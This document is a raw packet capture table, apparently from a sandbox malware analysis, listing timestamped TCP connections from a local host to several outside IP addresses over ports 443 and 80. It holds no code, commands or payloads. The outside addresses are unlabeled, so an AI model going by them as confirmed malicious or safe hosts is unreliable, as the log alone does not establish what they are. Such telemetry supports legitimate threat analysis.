                                                                            Dec 3, 2024 18:54:21.165663004 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:21.165678978 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:21.165956974 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:21.165968895 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:21.166112900 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:21.497910023 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:21.497921944 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:21.498040915 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:21.498142958 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:21.498172045 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:21.498352051 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:21.498626947 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:21.538727045 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:21.539109945 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:21.830722094 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:21.830931902 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:21.830988884 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:21.831039906 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:21.831217051 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:21.831258059 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:21.831341028 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:21.831372976 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:21.831541061 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:21.831542015 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:21.831573963 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:21.831753969 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:21.831819057 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:21.831857920 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:21.831897020 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:21.832007885 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:21.832007885 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:21.832046986 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:21.832212925 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:21.870937109 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:21.871157885 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:21.871222973 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:21.871289015 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:21.871473074 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:21.871473074 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:21.871517897 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:21.871517897 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.164021969 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:22.164194107 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.164194107 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.164216042 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:22.164228916 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.164311886 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.164319992 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:22.164326906 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:22.164410114 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.164443970 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:22.164458036 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.164597034 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.164609909 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:22.164758921 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.164772034 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:22.164853096 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.164865017 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:22.164964914 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:22.165049076 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:22.165064096 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.165077925 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:22.165153027 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.165174961 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:22.165379047 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.165441990 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.165453911 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:22.165564060 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.165724993 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.203602076 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:22.203792095 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.203799963 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:22.203870058 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.203913927 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:22.203953028 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.204123974 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:22.204127073 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.204189062 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:22.204313040 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.204313040 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.204447985 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.496526003 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:22.496778965 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.496798992 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:22.497009993 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.497061968 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:22.497147083 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.497216940 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.497359037 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:22.497546911 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.497567892 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:22.497595072 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.497628927 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:22.497847080 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.497987986 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:22.498044968 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.498097897 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:22.498131037 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.498153925 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:22.498240948 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.498265028 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:22.498372078 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.498491049 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.498545885 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:22.498570919 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:22.498730898 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.498790979 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.498831987 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:22.499028921 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.499130011 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:22.499178886 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.499231100 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:22.499352932 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.499429941 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:22.499663115 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:22.499718904 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.500025988 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.538532972 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.538532972 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:22.538573980 CET44349748122.201.127.17192.168.11.20
                                                                            Dec 3, 2024 18:54:22.538711071 CET49748443192.168.11.20122.201.127.17
                                                                            Dec 3, 2024 18:54:54.931051970 CET4974980192.168.11.20202.92.5.23
                                                                            Dec 3, 2024 18:54:55.299032927 CET8049749202.92.5.23192.168.11.20
                                                                            Dec 3, 2024 18:54:55.299653053 CET4974980192.168.11.20202.92.5.23
                                                                            Dec 3, 2024 18:54:55.301713943 CET4974980192.168.11.20202.92.5.23
                                                                            Dec 3, 2024 18:54:55.669747114 CET8049749202.92.5.23192.168.11.20
                                                                            Dec 3, 2024 18:54:55.669975996 CET8049749202.92.5.23192.168.11.20
                                                                            Dec 3, 2024 18:54:55.670022964 CET8049749202.92.5.23192.168.11.20
                                                                            Dec 3, 2024 18:54:55.670061111 CET8049749202.92.5.23192.168.11.20
                                                                            Dec 3, 2024 18:54:55.670483112 CET4974980192.168.11.20202.92.5.23
                                                                            Dec 3, 2024 18:54:55.671029091 CET4974980192.168.11.20202.92.5.23
                                                                            Dec 3, 2024 18:54:56.038701057 CET8049749202.92.5.23192.168.11.20
                                                                            Dec 3, 2024 18:55:10.878154039 CET4975080192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:55:11.033296108 CET804975013.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:55:11.033524036 CET4975080192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:55:11.037081003 CET4975080192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:55:11.191473961 CET804975013.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:55:11.191488028 CET804975013.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:55:11.191718102 CET4975080192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:55:12.544141054 CET4975080192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:55:12.698556900 CET804975013.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:55:13.560301065 CET4975180192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:55:13.713746071 CET804975113.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:55:13.713992119 CET4975180192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:55:13.717525959 CET4975180192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:55:13.869811058 CET804975113.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:55:13.870238066 CET804975113.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:55:13.870409966 CET4975180192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:55:15.231100082 CET4975180192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:55:15.383153915 CET804975113.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:55:16.247334003 CET4975280192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:55:16.403412104 CET804975213.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:55:16.403656006 CET4975280192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:55:16.407412052 CET4975280192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:55:16.562357903 CET804975213.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:55:16.562370062 CET804975213.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:55:16.562376976 CET804975213.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:55:16.562566042 CET804975213.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:55:18.934274912 CET4975380192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:55:19.090127945 CET804975313.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:55:19.090396881 CET4975380192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:55:19.092852116 CET4975380192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:55:19.247643948 CET804975313.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:55:19.256767035 CET804975313.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:55:19.256819963 CET804975313.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:55:19.257390976 CET4975380192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:55:19.257813931 CET4975380192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:55:19.412666082 CET804975313.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:55:24.467616081 CET4975480192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:55:24.657720089 CET8049754209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:24.657958031 CET4975480192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:55:24.661668062 CET4975480192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:55:24.850106955 CET8049754209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:24.856693983 CET8049754209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:24.856713057 CET8049754209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:24.857075930 CET4975480192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:55:26.166107893 CET4975480192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:55:27.182524920 CET4975580192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:55:27.371006966 CET8049755209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:27.371444941 CET4975580192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:55:27.374723911 CET4975580192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:55:27.562988043 CET8049755209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:27.571683884 CET8049755209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:27.571702003 CET8049755209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:27.571981907 CET4975580192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:55:28.884264946 CET4975580192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:55:29.900516033 CET4975680192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:55:30.088928938 CET8049756209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:30.089267969 CET4975680192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:55:30.092909098 CET4975680192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:55:30.281513929 CET8049756209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:30.281560898 CET8049756209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:30.281591892 CET8049756209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:30.281712055 CET8049756209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:30.281744957 CET8049756209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:30.290868998 CET8049756209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:30.290925026 CET8049756209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:30.291099072 CET4975680192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:55:31.602334976 CET4975680192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:55:32.618534088 CET4975780192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:55:32.806858063 CET8049757209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:32.807490110 CET4975780192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:55:32.809967995 CET4975780192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:55:32.998609066 CET8049757209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:33.005325079 CET8049757209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:33.005376101 CET8049757209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:33.005769014 CET4975780192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:55:33.006475925 CET4975780192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:55:33.195235968 CET8049757209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:55:39.089813948 CET4975880192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:39.280294895 CET804975823.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:39.280658007 CET4975880192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:39.284168005 CET4975880192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:39.471441031 CET804975823.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:39.471782923 CET4975880192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:39.474644899 CET804975823.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:39.662285089 CET804975823.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:39.662306070 CET804975823.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:39.662480116 CET4975880192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:40.788017035 CET4975880192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:41.804287910 CET4975980192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:41.994932890 CET804975923.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:41.995160103 CET4975980192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:41.998610020 CET4975980192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:42.185931921 CET804975923.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:42.186125040 CET4975980192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:42.188839912 CET804975923.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:42.376255989 CET804975923.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:42.376349926 CET804975923.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:42.376533985 CET4975980192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:43.506125927 CET4975980192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:44.522391081 CET4976080192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:44.711276054 CET804976023.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:44.711683035 CET4976080192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:44.715244055 CET4976080192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:44.900614977 CET804976023.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:44.900976896 CET4976080192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:44.903734922 CET804976023.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:45.089442968 CET804976023.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:45.089453936 CET804976023.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:45.089692116 CET804976023.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:45.089701891 CET804976023.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:45.089708090 CET804976023.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:45.089734077 CET4976080192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:45.277770042 CET804976023.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:47.240401983 CET4976180192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:47.430413008 CET804976123.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:47.430660009 CET4976180192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:47.433063984 CET4976180192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:47.620858908 CET804976123.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:47.621149063 CET4976180192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:47.623100042 CET804976123.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:47.811270952 CET804976123.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:47.811317921 CET804976123.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:47.811594009 CET4976180192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:47.812160969 CET4976180192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:55:48.006419897 CET804976123.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:55:53.200433969 CET4976280192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:55:53.439320087 CET804976246.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:55:53.439523935 CET4976280192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:55:53.443073034 CET4976280192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:55:53.682226896 CET804976246.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:55:53.682337046 CET804976246.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:55:53.682394028 CET804976246.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:55:53.682677031 CET4976280192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:55:54.956578016 CET4976280192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:55:55.972703934 CET4976380192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:55:56.211750984 CET804976346.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:55:56.212071896 CET4976380192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:55:56.215830088 CET4976380192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:55:56.454921961 CET804976346.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:55:56.454977036 CET804976346.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:55:56.455013037 CET804976346.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:55:56.455161095 CET4976380192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:55:57.721537113 CET4976380192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:55:58.737799883 CET4976480192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:55:58.990773916 CET804976446.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:55:58.991039991 CET4976480192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:55:58.994667053 CET4976480192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:55:58.994745016 CET4976480192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:55:59.247531891 CET804976446.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:55:59.247560978 CET804976446.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:55:59.247759104 CET804976446.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:55:59.247987032 CET804976446.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:55:59.248014927 CET804976446.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:55:59.251279116 CET804976446.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:55:59.251496077 CET804976446.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:55:59.251794100 CET4976480192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:56:00.502270937 CET4976480192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:56:01.518343925 CET4976580192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:56:01.757821083 CET804976546.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:56:01.757980108 CET4976580192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:56:01.760416985 CET4976580192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:56:02.000009060 CET804976546.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:56:02.000062943 CET804976546.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:56:02.000098944 CET804976546.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:56:02.000339985 CET4976580192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:56:02.001044035 CET4976580192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:56:02.240288973 CET804976546.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:56:07.451188087 CET4976680192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:07.638350964 CET8049766103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:56:07.638598919 CET4976680192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:07.642168045 CET4976680192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:07.843976021 CET8049766103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:56:07.844024897 CET8049766103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:56:07.844274998 CET4976680192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:09.156536102 CET4976680192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:10.172693014 CET4976780192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:10.360105991 CET8049767103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:56:10.360256910 CET4976780192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:10.363874912 CET4976780192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:10.568619013 CET8049767103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:56:10.568669081 CET8049767103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:56:10.568828106 CET4976780192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:11.874634027 CET4976780192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:12.890857935 CET4976880192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:13.078408957 CET8049768103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:56:13.078664064 CET4976880192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:13.082297087 CET4976880192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:13.082361937 CET4976880192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:13.269910097 CET8049768103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:56:13.270044088 CET8049768103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:56:13.270077944 CET8049768103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:56:13.270386934 CET8049768103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:56:13.270431042 CET8049768103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:56:13.278017044 CET8049768103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:56:13.278065920 CET8049768103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:56:13.278283119 CET4976880192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:14.592931032 CET4976880192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:15.609091043 CET4976980192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:15.796427965 CET8049769103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:56:15.796612978 CET4976980192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:15.799074888 CET4976980192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:56:15.996423960 CET8049769103.224.182.242192.168.11.20
